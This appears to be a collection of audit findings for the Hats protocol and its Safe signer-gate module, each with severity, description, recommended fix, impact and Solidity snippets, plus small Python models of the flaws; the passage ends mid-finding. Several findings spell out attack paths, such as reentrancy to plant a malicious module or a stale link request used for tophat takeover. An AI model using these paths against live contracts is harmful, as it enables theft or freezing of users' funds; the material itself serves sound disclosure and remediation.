Each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert once the new owners are activated as valid signers.\\nIn the worst case scenario, valid signers wearing an immutable hat are added as owners when the safe's threshold is already at `targetThreshold`. The check passes, but the new owners are already valid signers. There is no admin action that can revoke the validity of their hats, so the `reconcileSignerCount()` function will always revert, and therefore the safe is unusable.\\nSince `maxSigners` is immutable and can't be changed, the only solution is for the hat wearers to renounce their hats. Otherwise, the safe will remain unusable with all funds trapped inside.
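A counts-only sketch of the worst case (the specific numbers are assumptions): the post-flight threshold check passes while `reconcileSignerCount()` is pushed into a permanent revert:

```python
MIN_T, TARGET_T, MAX_SIGNERS = 2, 7, 10   # assumed configuration

def correct_threshold(valid_signers: int) -> int:
    """Models _getCorrectThreshold: count clamped to [MIN_T, TARGET_T]."""
    return max(MIN_T, min(TARGET_T, valid_signers))

valid_signers, safe_threshold = 9, 7        # threshold already pinned at target
assert safe_threshold == correct_threshold(valid_signers)   # pre-state is fine

valid_signers += 4   # the tx adds 4 more owners wearing an immutable signer hat
post_check_passes = safe_threshold == correct_threshold(valid_signers)
permanently_stuck = valid_signers > MAX_SIGNERS

print(post_check_passes, permanently_stuck)   # True True
```

Because the threshold is clamped at `targetThreshold`, the post-flight comparison is blind to how many valid signers exist above it, while `reconcileSignerCount()` is not.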
There should be a check in `checkAfterExecution()` that ensures that the number of owners on the safe has not changed throughout the execution.\\nIt also may be recommended that the `maxSigners` value is adjustable by the contract owner.
Signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nIn a less malicious case, signers might accidentally add too many owners and end up needing to manage the logistics of having users renounce their hats.
```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n
Other module can add owners to safe that push us above maxSigners, bricking safe
high
If another module adds owners to the safe, these additions are not checked by our module or guard's logic. This can result in pushing us over `maxSigners`, which will cause all transactions to revert. In the case of an immutable hat, the only way to avoid the safe being locked permanently (with all funds frozen) may be to convince many hat wearers to renounce their hats.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, if there are other modules on the safe, they are able to add additional owners without these checks.\\nIn the case of `HatsSignerGate.sol`, there is no need to call `claimSigner()` to "activate" these owners. They will automatically be valid as long as they are a wearer of the correct hat.\\nThis could lead to an issue where many (more than maxSigners) wearers of an immutable hat are added to the safe as owners. Now, each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert.\\nWorse, there is nothing the admin can do about it. If they don't have control over the eligibility address for the hat, they are not able to burn the hats or transfer them.\\nThe safe will be permanently bricked and unable to perform transactions unless the hat wearers agree to renounce their hats.
If `validSignerCount > maxSigners`, there should be some mechanism to reduce the number of signers rather than reverting.\\nAlternatively, as suggested in another issue, to get rid of all the potential risks of having other modules able to make changes outside of your module's logic, we should create the limit that the HatsSignerGate module can only exist on a safe with no other modules.
The safe can be permanently bricked and unable to perform transactions unless the hat wearers agree to renounce their hats.
```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n
If another module adds a module, the safe will be bricked
high
If a module is added by another module, it will bypass the `enableNewModule()` function that increments `enabledModuleCount`. This will throw off the module validation in `checkTransaction()` and `checkAfterExecution()` and could cause the safe to become permanently bricked.\\nIn order to ensure that signers cannot add new modules to the safe (thus giving them unlimited future governing power), the guard portion of the gate checks that the hash of the modules before the transaction is the same as the hash after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nYou'll note that the "before" check uses `enabledModuleCount` and the "after" check uses `enabledModuleCount + 1`. The reason for this is that we want to be able to catch whether the user added a new module, which requires us taking a larger pagination to make sure we can view the additional module.\\nHowever, if we were to start with a number of modules larger than `enabledModuleCount`, the result would be that the "before" check would clip off the final modules, and the "after" check would include them, thus leading to different hashes.\\nThis situation can only arise if a module is added that bypasses the `enableModule()` function. But this exact situation can happen if one of the other modules on the safe adds a module to the safe.\\nIn this case, the modules on the safe will increase but `enabledModuleCount` will not. 
This will lead to the "before" and "after" checks returning different arrays each time, and therefore disallowing transactions.\\nThe only possible fix is to have the other module remove the additional module it added. But, depending on the specific circumstances, this may not be possible. For example, the module that performed the adding may not have the ability to remove modules.
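The pagination mismatch can be modeled in a few lines of Python (module addresses are made up):

```python
modules = ["0xM1", "0xM2", "0xM3"]   # 0xM3 was added by another module
enabled_module_count = 2             # enableNewModule() was never called for it

# "before" snapshot paginates enabled_module_count entries; the "after"
# check paginates enabled_module_count + 1, so their views now differ forever
before_snapshot = tuple(modules[:enabled_module_count])     # clips 0xM3
after_view = tuple(modules[:enabled_module_count + 1])      # includes 0xM3
print(before_snapshot == after_view)  # False -> SignersCannotChangeModules
```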
The module guarding logic needs to be rethought. Given the large number of unbounded risks it opens up, I would recommend not allowing other modules on any safes that use this functionality.
The safe can be permanently bricked, with the guard functions disallowing any transactions. All funds in the safe will remain permanently stuck.
```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n
Signers can bypass checks to add new modules to a safe by abusing reentrancy
high
The `checkAfterExecution()` function has checks to ensure that new modules cannot be added by signers. This is a crucial check, because adding a new module could give them unlimited power to make any changes (with no guards in place) in the future. However, by abusing reentrancy, the parameters used by the check can be changed so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors, the most important of which is adding new modules. This was an issue caught in the previous audit and fixed by comparing the hash of the modules before execution to the has of the modules after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nThis is further emphasized in the comments, where it is specified:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nWhy Restricting Modules is Important\\nModules are the most important thing to check. This is because modules have unlimited power not only to execute transactions but to skip checks in the future. 
Creating an arbitrary new module is so bad that it is equivalent to the other two issues together: getting complete control over the safe (as if the threshold were set to 1) and removing the guard (because guards aren't checked in module transactions).\\nHowever, this important restriction can be violated by abusing reentrancy into this function.\\nReentrancy Dysfunction\\nTo see how this is possible, we first have to take a quick detour regarding reentrancy. It appears that the protocol is attempting to guard against reentrancy with the `_guardEntries` variable. It is incremented in `checkTransaction()` (before a transaction is executed) and decremented in `checkAfterExecution()` (after the transaction has completed).\\nThe only protection it provides is in its risk of underflowing, explained in the comments as:\\n// leave checked to catch underflows triggered by re-erntry attempts\\nHowever, any attempt to reenter and send an additional transaction midstream of another transaction would first trigger the `checkTransaction()` function. This would increment `_guardEntries` and would lead to it not underflowing.\\nIn order for this system to work correctly, the `checkTransaction()` function should simply set `_guardEntries = 1`. This would result in an underflow with the second decrement.
But, as it is currently designed, there is no reentrancy protection.\\nUsing Reentrancy to Bypass Module Check\\nRemember that the module invariant is upheld by taking a snapshot of the hash of the modules in `checkTransaction()` and saving it in the `_existingModulesHash` variable.\\nHowever, imagine the following set of transactions:\\nSigners send a transaction via the safe, and modules are snapshotted to `_existingModulesHash`\\nThe transaction uses the Multicall functionality of the safe, and performs the following actions:\\nFirst, it adds the malicious module to the safe\\nThen, it calls `execTransaction()` on itself with any another transaction\\nThe second call will call `checkTransaction()`\\nThis will update `_existingModulesHash` to the new list of modules, including the malicious one\\nThe second call will execute, which doesn't matter (could just be an empty transaction)\\nAfter the transaction, `checkAfterExecution()` will be called, and the modules will match\\nAfter the full transaction is complete, `checkAfterExecution()` will be called for the first transaction, but since `_existingModulesHash` will be overwritten, the module check will pass
Use a more typical reentrancy guard format, such as checking to ensure `_guardEntries == 0` at the top of `checkTransaction()` or simply setting `_guardEntries = 1` in `checkTransaction()` instead of incrementing it.
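A counter-level Python model of the two guard designs (a sketch, not the Solidity implementation) showing why incrementing misses re-entry while setting the guard to 1 catches it via underflow:

```python
def reenter_detected(set_to_one: bool) -> bool:
    """Simulate an outer tx that re-enters once; True if the guard catches it."""
    entries = 0

    def check_transaction():
        nonlocal entries
        entries = 1 if set_to_one else entries + 1

    def check_after_execution() -> bool:
        nonlocal entries
        if entries == 0:
            return True          # models the unchecked-math underflow revert
        entries -= 1
        return False

    check_transaction()                           # outer tx pre-flight
    check_transaction()                           # re-entrant inner tx pre-flight
    caught = check_after_execution()              # inner tx post-flight
    caught = check_after_execution() or caught    # outer tx post-flight
    return caught

print(reenter_detected(set_to_one=False))  # False: increment design misses it
print(reenter_detected(set_to_one=True))   # True: set-to-1 design underflows
```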
Any number of signers who are above the threshold will be able to give themselves unlimited access over the safe with no restriction going forward.
```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n
Unlinked tophat retains linkedTreeRequests, can be rugged
high
When a tophat is unlinked from its admin, it is intended to regain its status as a tophat that is fully self-sovereign. However, because the `linkedTreeRequests` value isn't deleted, an independent tophat could still be vulnerable to "takeover" from another admin and could lose its sovereignty.\\nFor a tophat to get linked to a new tree, it calls `requestLinkTopHatToTree()` function:\\n```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n\\nThis creates a "request" to link to a given admin, which can later be approved by the admin in question:\\n```\\nfunction approveLinkTopHatToTree(uint32 _topHatDomain, uint256 _newAdminHat) external {\\n // for everything but the last hat level, check the admin of `_newAdminHat`'s theoretical child hat, since either wearer or admin of `_newAdminHat` can approve\\n if (getHatLevel(_newAdminHat) < MAX_LEVELS) {\\n _checkAdmin(buildHatId(_newAdminHat, 1));\\n } else {\\n // the above buildHatId trick doesn't work for the last hat level, so we need to explicitly check both admin and wearer in this case\\n _checkAdminOrWearer(_newAdminHat);\\n }\\n\\n // Linkages must be initiated by a request\\n if (_newAdminHat != linkedTreeRequests[_topHatDomain]) revert LinkageNotRequested();\\n\\n // remove the request -- ensures all linkages are initialized by unique requests,\\n // except for relinks (see `relinkTopHatWithinTree`)\\n delete linkedTreeRequests[_topHatDomain];\\n\\n // execute the link. 
Replaces existing link, if any.\\n _linkTopHatToTree(_topHatDomain, _newAdminHat);\\n}\\n```\\n\\nThis function shows that if there is a pending `linkedTreeRequests`, then the admin can use that to link the tophat into their tree and claim authority over it.\\nWhen a tophat is unlinked, it is expected to regain its sovereignty:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n\\nHowever, this function does not delete `linkedTreeRequests`.\\nTherefore, the following set of actions is possible:\\nTopHat is linked to Admin A\\nAdmin A agrees to unlink the tophat\\nAdmin A calls `requestLinkTopHatToTree` with any address as the admin\\nThis call succeeds because Admin A is currently an admin for TopHat\\nAdmin A unlinks TopHat as promised\\nIn the future, the address chosen can call `approveLinkTopHatToTree` and take over admin controls for the TopHat without the TopHat's permission
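A state-machine sketch of the rug in Python (the hat/domain IDs are arbitrary; the dictionaries model `linkedTreeAdmins` and `linkedTreeRequests`):

```python
linked_tree_admins = {}     # models linkedTreeAdmins
linked_tree_requests = {}   # models linkedTreeRequests

def request_link(domain: int, admin_hat: int) -> None:
    linked_tree_requests[domain] = admin_hat

def approve_link(domain: int, admin_hat: int) -> None:
    if linked_tree_requests.get(domain) != admin_hat:
        raise RuntimeError("LinkageNotRequested")
    del linked_tree_requests[domain]
    linked_tree_admins[domain] = admin_hat

def unlink(domain: int) -> None:
    linked_tree_admins.pop(domain, None)   # bug: the request is NOT deleted

TOPHAT, ADMIN_A, ATTACKER_HAT = 1, 100, 200   # arbitrary IDs
linked_tree_admins[TOPHAT] = ADMIN_A   # tophat currently linked to Admin A
request_link(TOPHAT, ATTACKER_HAT)     # Admin A plants a request while admin
unlink(TOPHAT)                         # tophat believes it is sovereign again
approve_link(TOPHAT, ATTACKER_HAT)     # later: takeover, no permission needed
print(linked_tree_admins[TOPHAT])      # 200
```

With the recommended `delete linkedTreeRequests[_topHatDomain]` added to `unlink`, the final `approve_link` would revert with `LinkageNotRequested`.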
In `unlinkTopHatFromTree()`, the `linkedTreeRequests` should be deleted:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n// Add the line below\\n delete linkedTreeRequests[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n
Tophats that expect to be fully self-sovereign and without any oversight can be surprisingly claimed by another admin, because settings from a previous admin remain through unlinking.
```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n
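The stale-request lifecycle described above can be modeled with a minimal Python sketch (illustrative only — dicts stand in for the Solidity `linkedTreeRequests` / `linkedTreeAdmins` mappings, and the function names mirror but are not the contract's API):

```python
# Minimal model of the link/unlink flow; dicts stand in for Solidity mappings.
linked_tree_admins = {}    # topHatDomain -> admin hat id
linked_tree_requests = {}  # topHatDomain -> requested admin hat id

def request_link(top_hat_domain, requested_admin):
    linked_tree_requests[top_hat_domain] = requested_admin

def approve_link(top_hat_domain, new_admin):
    # linkages must be initiated by a request
    assert linked_tree_requests.get(top_hat_domain) == new_admin
    del linked_tree_requests[top_hat_domain]
    linked_tree_admins[top_hat_domain] = new_admin

def unlink_buggy(top_hat_domain):
    linked_tree_admins.pop(top_hat_domain, None)
    # BUG: linked_tree_requests is NOT cleared here

def unlink_fixed(top_hat_domain):
    linked_tree_admins.pop(top_hat_domain, None)
    linked_tree_requests.pop(top_hat_domain, None)  # fix: clear pending request

# Attack path: admin A plants a rogue request, then unlinks as promised.
request_link(1, 0xA)
approve_link(1, 0xA)                   # tophat 1 now linked to admin A
request_link(1, 0xB)                   # A (still admin) plants a rogue request
unlink_buggy(1)                        # tophat believes it is sovereign again
assert linked_tree_requests[1] == 0xB  # stale request survives unlinking
approve_link(1, 0xB)                   # takeover without the tophat's consent
assert linked_tree_admins[1] == 0xB
```

With `unlink_fixed`, the planted request is deleted along with the link, so the later `approve_link` call fails its request check.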
Owners can be swapped even though they still wear their signer hats
medium
`HatsSignerGateBase` does not check for a change of owners post-flight. This allows a group of actors to collude and replace opposing signers with cooperating signers, even though the replaced signers still wear their signer hats.\\nThe `HatsSignerGateBase` performs various checks to prevent a multisig transaction to tamper with certain variables. Something that is currently not checked for in `checkAfterExecution` is a change of owners. A colluding group of malicious signers could abuse this to perform swaps of safe owners by using a delegate call to a corresponding malicious contract. This would bypass the requirement of only being able to replace an owner if he does not wear his signer hat anymore as used in _swapSigner:\\n```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n "swapOwner(address,address,address)",\\n // rest of code\\n```\\n
Perform a pre- and post-flight comparison on the safe owners, analogous to what is currently done with the modules.
Malicious signers can bypass restrictions and perform actions that should be disallowed.
```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n "swapOwner(address,address,address)",\\n // rest of code\\n```\\n
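The recommended pre-/post-flight owner comparison can be sketched in Python (illustrative; `sha256` stands in for the `keccak256(abi.encode(...))` snapshot the contract already uses for modules):

```python
import hashlib

def owners_hash(owners):
    # stand-in for keccak256(abi.encode(owners)); sha256 used for illustration
    return hashlib.sha256(",".join(owners).encode()).hexdigest()

# pre-flight: snapshot the owners before the safe executes the transaction
owners_before = ["0xAlice", "0xBob", "0xCarol"]
snapshot = owners_hash(owners_before)

# a malicious delegatecall swaps an owner during execution
owners_after = ["0xAlice", "0xBob", "0xMallory"]

# post-flight: any change of owners is detected and the transaction reverts
assert owners_hash(owners_after) != snapshot
```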
Unbounded recursive function calls can use unlimited gas and break Hats operations
medium
Some of the functions in the Hats and HatsIdUtilities contracts have recursive logic with no limit on the number of iterations. This can cause unlimited gas usage if a hat tree has huge depth, and it won't be possible to call the contracts' functions. The functions `getImageURIForHat()`, `isAdminOfHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` would revert, and because most of the logic calls those functions, the contract would be in a broken state for those hats.\\nThis is the `isAdminOfHat()` code:\\n```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if 
(linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n\\nAs you can see, this function calls itself recursively to check whether the user is a wearer of one of the upper linked hats. If the chain (depth) of hats in the tree becomes very long, this function would revert because of the gas usage, and the gas cost would be high enough that it won't be possible to call this function in a transaction. The functions `getImageURIForHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` have similar issues, and their gas usage depends on the tree depth. The issue can happen suddenly for hats if a top-level topHat decides to add a link, for example:\\nHat1 is linked to a chain of hats that has 1000 "root hats", and its topHat (tippy hat) is TIPHat1.\\nHat2 is linked to a chain of hats that has 1000 "root hats", and its topHat (tippy hat) is TIPHat2.\\nThe admin of TIPHat1 decides to link it to Hat2; after that, the total depth of the tree increases to 2000 and transactions would cost twice as much gas.
The code should enforce a maximum hat tree depth and disallow actions that breach it. (Keep the depth of each tophat's tree, update it when actions happen, and reject actions that would increase the depth beyond the threshold.)
It won't be possible to perform actions for those hats, and funds can be lost because of it.
```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n
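The unbounded traversal and the recommended depth cap can be modeled in a short Python sketch (illustrative only — a dict stands in for the `linkedTreeAdmins` mapping and an explicit depth counter stands in for the gas budget):

```python
# Model of admin lookup walking linkedTreeAdmins across linked trees.
linked_tree_admins = {i: i + 1 for i in range(500)}  # a 500-link chain

def is_admin_of(user_wears, domain, max_depth=None, depth=0):
    # bounded variant (max_depth set) models the recommended depth threshold
    if max_depth is not None and depth >= max_depth:
        raise RecursionError("link chain too deep")
    parent = linked_tree_admins.get(domain)
    if parent is None:
        return False  # reached an unlinked tophat
    if parent in user_wears:
        return True
    return is_admin_of(user_wears, parent, max_depth, depth + 1)

# Unbounded: cost grows linearly with chain depth (500 recursive calls here).
assert is_admin_of({500}, 0) is True
# Bounded: a maximum-level check fails fast instead of consuming unlimited gas.
try:
    is_admin_of({500}, 0, max_depth=64)
    raise AssertionError("should have hit the depth cap")
except RecursionError:
    pass
```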
The Hats contract needs to override the ERC1155.balanceOfBatch function
medium
The Hats contract does not override the ERC1155.balanceOfBatch function\\nThe Hats contract overrides the ERC1155.balanceOf function to return a balance of 0 when the hat is inactive or the wearer is ineligible.\\n```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n\\nBut the Hats contract does not override the ERC1155.balanceOfBatch function, which causes balanceOfBatch to return the actual balance no matter what the circumstances.\\n```\\n function balanceOfBatch(address[] calldata owners, uint256[] calldata ids)\\n public\\n view\\n virtual\\n returns (uint256[] memory balances)\\n {\\n require(owners.length == ids.length, "LENGTH_MISMATCH");\\n\\n balances = new uint256[](owners.length);\\n\\n // Unchecked because the only math done is incrementing\\n // the array index counter which cannot possibly overflow.\\n unchecked {\\n for (uint256 i = 0; i < owners.length; ++i) {\\n balances[i] = _balanceOf[owners[i]][ids[i]];\\n }\\n }\\n }\\n```\\n
Consider overriding the ERC1155.balanceOfBatch function in Hats contract to return 0 when the hat is inactive or the wearer is ineligible.
This will make `balanceOfBatch` return a different result than `balanceOf`, which may cause errors when integrating with other projects.
```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n
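The inconsistency can be modeled with a minimal Python sketch (illustrative; dicts stand in for the ERC1155 `_balanceOf` storage and the hat status checks):

```python
# Model: balanceOf gates on hat status, balanceOfBatch reads raw storage.
raw_balance = {("0xWearer", 1): 1}
hat_active = {1: False}  # the hat has been toggled off

def balance_of(wearer, hat_id):
    # overridden variant: inactive/ineligible hats report 0
    if not hat_active.get(hat_id, False):
        return 0
    return raw_balance.get((wearer, hat_id), 0)

def balance_of_batch(owners, ids):
    # ERC1155 default: raw storage reads, no status check
    return [raw_balance.get((o, i), 0) for o, i in zip(owners, ids)]

assert balance_of("0xWearer", 1) == 0
assert balance_of_batch(["0xWearer"], [1]) == [1]  # inconsistent result
```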
[Medium][Outdated State] `_removeSigner` incorrectly updates `signerCount` and safe `threshold`
medium
`_removeSigner` can be called whenever a signer is no longer valid, to remove the invalid signer. However, under certain situations, `_removeSigner` incorrectly reduces `signerCount` and sets the `threshold` incorrectly.\\n`_removeSigner` uses the code snippet below to decide if `signerCount` should be reduced:\\n```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n\\nThe first clause is supposed to be activated when `validSignerCount` and `currentSignerCount` are still in sync and we want to remove an invalid signer. The second clause is for when we need to identify a previously active signer which is now inactive and want to remove it. However, it does not take into account that a previously inactive signer may have become active again. In the scenario described below, `signerCount` would be updated incorrectly:\\n(1) Imagine there are 5 signers, where 0, 1 and 2 are active while 3 and 4 are inactive; the current `signerCount = 3`. (2) If signer 3 regains its hat, it becomes active again. (3) If we then want to delete signer 4 from the owners' list, the `_removeSigner` function will go through the signers and find 4 valid signers; since `currentSignerCount` is still 3, `validSignerCount == currentSignerCount` is false. (4) In this case, even though `validSignerCount` increased, `_removeSigner` reduces `signerCount` by one.
Check if the number of `validSignerCount` decreased instead of checking equality:\\n```\\n@line 387 HatsSignerGateBase\\n- if (validSignerCount == currentSignerCount) {\\n+ if (validSignerCount >= currentSignerCount) {\\n```\\n
This can cause `signerCount` and the safe `threshold` to update incorrectly, which can lead to further problems, such as an incorrect number of required signatures.
```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n
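The faulty equality check and the recommended `>=` fix can be compared in a small Python model (illustrative; these helpers mirror only the counting logic, not the contract's API):

```python
def new_signer_count_buggy(valid, current):
    # original: only exact equality keeps the count unchanged
    return current if valid == current else current - 1

def new_signer_count_fixed(valid, current):
    # recommended fix: never decrement when validity was regained
    return current if valid >= current else current - 1

# scenario from the finding: signer 3 regained its hat (4 valid signers),
# while currentSignerCount is still 3, and invalid signer 4 is removed
valid_signer_count, current_signer_count = 4, 3
assert new_signer_count_buggy(valid_signer_count, current_signer_count) == 2  # wrong
assert new_signer_count_fixed(valid_signer_count, current_signer_count) == 3
```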
Safe threshold can be set above target threshold, causing transactions to revert
medium
If a `targetThreshold` is set below the safe's threshold, the `reconcileSignerCount()` function will fail to adjust the safe's threshold as it should, leading to a mismatch that causes all transactions to revert.\\nIt is possible and expected that the `targetThreshold` can be lowered, sometimes even lower than the current safe threshold.\\nIn the `setTargetThreshold()` function, there is an automatic update to lower the safe threshold accordingly. However, in the event that the `signerCount < 2`, it will not occur. This could easily happen if, for example, the hat is temporarily toggled off.\\nBut this should be fine! In this instance, when a new transaction is processed, `checkTransaction()` will be called, which calls `reconcileSignerCount()`. This should fix the problem by resetting the safe's threshold to be within the range of `minThreshold` to `targetThreshold`.\\nHowever, the logic to perform this update is faulty.\\n```\\nuint256 currentThreshold = safe.getThreshold();\\nuint256 newThreshold;\\nuint256 target = targetThreshold; // save SLOADs\\n\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n```\\n\\nAs you can see, in the event that the 